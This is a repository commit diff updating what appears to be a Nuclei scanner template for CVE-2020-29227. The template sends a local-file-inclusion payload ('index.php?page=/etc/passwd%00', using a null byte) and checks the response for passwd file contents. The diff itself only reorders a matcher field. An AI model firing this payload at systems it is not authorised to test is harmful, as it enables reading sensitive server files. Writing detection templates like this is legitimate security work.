Update CVE-2020-29227.yaml
parent
0697346ae6
commit
3567667123
|
@ -18,12 +18,14 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?page=/etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
Loading…
Reference in New Issue